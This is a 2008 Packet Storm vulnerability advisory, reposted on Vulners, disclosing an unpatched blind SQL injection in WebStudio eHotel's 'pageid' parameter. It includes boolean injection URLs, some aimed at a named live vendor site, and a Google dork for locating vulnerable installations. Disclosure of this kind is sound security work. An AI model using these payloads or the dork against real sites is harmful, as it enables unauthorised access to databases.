Lucene search

K

webstudioehotel-sql.txt

🗓️ 26 Nov 2008 00:00:00Reported by Glafkos CharalambousType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

WebStudio eHotel SQL injection vulnerability - critical and unpatche

Show more
Code
`Application: WebStudio eHotel  
  
Vendor Name: BDigital Media Ltd  
  
Vendors Url: http://www.bdigital.biz  
  
Bug Type: WebStudio eHotel (pageid) Blind SQL Injection Vulnerability  
  
Exploitation: Remote  
  
Severity: Critical  
  
Solution Status: Unpatched   
  
Google Dork: "Powered by WebStudio" eHotel  
  
  
  
Description:  
  
  
  
WebStudio eHotel is prone to an SQL-injection vulnerability because it fails  
to sufficiently sanitize user-supplied data before using it in an SQL query.  
  
Exploiting this issue could allow an attacker to compromise the application,  
access or modify data, or exploit latent vulnerabilities in the underlying  
database.  
  
  
  
PoC:  
  
  
  
http://localhost/index.php?pageid=50+and+1=1 ( TRUE )  
  
  
  
http://localhost/index.php?pageid=50+and+1=2 ( FALSE )  
  
  
  
Exploit:  
  
  
  
http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=3 ( TRUE  
)  
  
  
  
http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=4 ( FALSE  
)  
  
  
  
http://localhost/index.php?pageid=50+and+substring(@@version,1,1)=5 ( FALSE  
)  
  
  
  
Demo:  
  
  
  
http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1  
,1)=3 ( TRUE )  
  
  
  
http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1  
,1)=4 ( FALSE )  
  
  
  
http://www.webstudioehotel.com/index.php?pageid=50+and+substring(@@version,1  
,1)=5 ( FALSE )  
  
  
  
  
  
Solution:  
  
  
  
There was no vendor-supplied solution at the time of entry.  
  
  
  
Edit source code manually to ensure user-supplied input is correctly  
sanitised.  
  
  
  
  
  
Credits:  
  
  
  
Charalambous Glafkos  
  
Email: glafkos (at) astalavista (dot) com  
  
___________________________________________  
  
ASTALAVISTA - the hacking & security community  
  
www.astalavista.com  
  
www.astalavista.net  
  
  
  
  
  
  
  
Best Regards,  
Charalambous Glafkos ( nowayout )  
__________________________________________  
ASTALAVISTA - the hacking & security community  
<http://www.astalavista.com/> www.astalavista.com  
<http://www.astalavista.net/> www.astalavista.net  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Nov 2008 00:00Current
7.4High risk
Vulners AI Score7.4
22
.json
Report